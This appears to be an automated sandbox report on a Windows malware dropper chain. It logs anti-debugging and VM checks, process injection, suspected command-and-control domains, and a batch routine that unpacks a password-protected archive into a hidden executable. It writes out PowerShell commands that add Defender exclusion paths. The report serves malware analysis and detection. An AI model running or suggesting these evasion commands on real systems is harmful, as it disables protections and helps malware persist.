                      Source: 513dad5c05.exe, 00000038.00000000.2960899475.00000000005B3000.00000080.00000001.01000000.0000001F.sdmpBinary or memory string: \\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                      Source: 4268204ace.exe, 0000000F.00000002.2724972964.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000001F.00000002.2607791227.0000017A9D4B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: PING.EXE, 00000027.00000002.2631965049.000002202AB29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllnn
                      Source: explorer.exe, 00000033.00000002.2933758160.0000000000BE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpv
                      Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeOpen window title or class name: regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeOpen window title or class name: gbdyllo
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeOpen window title or class name: procmon_window_class
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeOpen window title or class name: ollydbg
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeOpen window title or class name: filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: NTICE
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: SICE
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: SIWVID
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSystem information queried: KernelDebuggerInformation
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\explorer.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeProcess queried: DebugPort
                      Source: C:\Windows\explorer.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_048A0CCD rdtsc 0_2_048A0CCD
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_002166A8 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,11_2_002166A8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008652B mov eax, dword ptr fs:[00000030h]0_2_0008652B
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008A302 mov eax, dword ptr fs:[00000030h]0_2_0008A302
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_0072A302 mov eax, dword ptr fs:[00000030h]1_2_0072A302
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_0072652B mov eax, dword ptr fs:[00000030h]1_2_0072652B
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: 4268204ace.exe PID: 7312, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 7d28d37061cb43098969a37cf25a380a.exe PID: 5916, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 513dad5c05.exe PID: 7432, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs"
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2368 base: 140000000 value: 4D
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2368 base: 140001000 value: 40
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2368 base: 1402DD000 value: 58
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2368 base: 14040B000 value: A4
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2368 base: 140739000 value: 00
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2368 base: 14075E000 value: 48
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2368 base: 14075F000 value: 48
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2368 base: 140762000 value: 48
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2368 base: 140764000 value: 00
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2368 base: 140765000 value: 00
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2368 base: BEB010 value: 00
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7580 base: 140000000 value: 4D
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7580 base: 140001000 value: 40
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7580 base: 1402DD000 value: 58
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7580 base: 14040B000 value: A4
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7580 base: 140739000 value: 00
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7580 base: 14075E000 value: 48
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7580 base: 14075F000 value: 48
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7580 base: 140762000 value: 48
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7580 base: 140764000 value: 00
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7580 base: 140765000 value: 00
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7580 base: 9B0010 value: 00
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sweepyribs.lat
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeThread register set: target process: 2368
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeThread register set: target process: 7580
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe "C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe "C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe "C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe "C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe "C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe "C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe "C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe "C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe "C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe" Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess created: unknown unknown
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeProcess created: unknown unknown
                      Source: 9d4ddc637a.exe, 0000003A.00000002.3176645675.0000000000EA2000.00000002.00000001.01000000.00000020.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                      Source: 77594b3442.exe, 00000039.00000002.3105827870.0000000000DB1000.00000040.00000001.01000000.0000001E.sdmpBinary or memory string: ]Program Manager
                      Source: file.exe, file.exe, 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, skotes.exe, 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: OProgram Manager
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_0021D670 cpuid 11_2_0021D670
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019016001\wNFfgZ1.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019016001\wNFfgZ1.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019034001\ce29828af5.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019034001\ce29828af5.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019035001\964c9facda.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019035001\964c9facda.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019036001\164919d456.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019036001\164919d456.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019037001\9905c00c72.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019037001\9905c00c72.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019038001\fcd2b0e3cd.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019038001\fcd2b0e3cd.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019039001\d7884c562e.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019039001\d7884c562e.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019040001\73c096c84a.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019040001\73c096c84a.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
